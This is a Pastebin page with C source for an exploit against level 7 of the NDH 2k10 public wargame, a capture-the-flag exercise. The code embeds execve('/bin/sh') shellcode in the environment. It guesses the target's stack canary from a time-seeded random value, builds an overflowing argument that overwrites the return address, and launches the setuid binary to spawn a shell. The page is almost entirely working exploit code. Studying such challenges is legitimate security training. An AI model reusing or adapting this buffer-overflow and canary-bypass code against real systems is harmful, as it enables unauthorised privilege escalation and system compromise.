Advertisement
raisep0wn

NDH 2k10 public wargame, level7, exploit

May 18th, 2011
246
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.66 KB | None | 0 0
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <unistd.h>
  4. #include <string.h>
  5.  
  6. //Target program
  7. char target_path[] = "/home/level7/level7";
  8. char target_name[] = "level7";
  9. //Shellcode to spawn a shell
  10. char *shellcode[] = {"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", (char *)0};
  11.  
  12. int main(int argc, char *argv[])
  13. {
  14.  char arg[85];      //Argument like {<prog> "<garbage[64]><canary[4]><garbage[12]><eip[4]>"}
  15.  char canary[5];    //Canary in little-endian string
  16.  char eip[5];       //Eip in little-endian string
  17.  
  18.  //Getting shellcode address in environment variable array *shellcode[]
  19.  unsigned int shaddr = 0xbffffffc - (strlen(target_path)+1 + strlen(shellcode[0])+1);
  20.  
  21.  //Generate the random value based on system time
  22.  srand(time(NULL));
  23.  unsigned int r = random();
  24.  
  25.  //Convert canary and @shellcode into little-endian
  26.  snprintf(canary, 5, "%c%c%c%c", (char)r&0x000000FF, (char)(r >> 8)&0x000000FF, (char)(r >> 16)&0x000000FF, (char)(r >> 24)&0x000000FF);
  27.  snprintf(eip, 5, "%c%c%c%c", (char)shaddr&0x000000FF, (char)(shaddr >> 8)&0x000000FF, (char)(shaddr >> 16)&0x000000FF, (char)(shaddr >> 24)&0x000000FF);
  28.  //Concat arg string
  29.  snprintf(arg, 85, "----------------------------------------------------------------%s------------%s", canary, eip);
  30.  
  31.  //Debug info
  32.  printf("Arg = %s\n", arg);
  33.  printf("Canary = 0x%08X <-> %s\n", r, canary);
  34.  printf("@sh = 0x%08x <-> eip = %s\n\n", shaddr, eip);
  35.  
  36.  //Exploit
  37.  if(!execle(target_path, target_name, arg, (char *)0, shellcode))
  38.  {
  39.   perror("Unable to execute the target.\n");
  40.   exit(1);
  41.  }
  42.  return 0;
  43. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement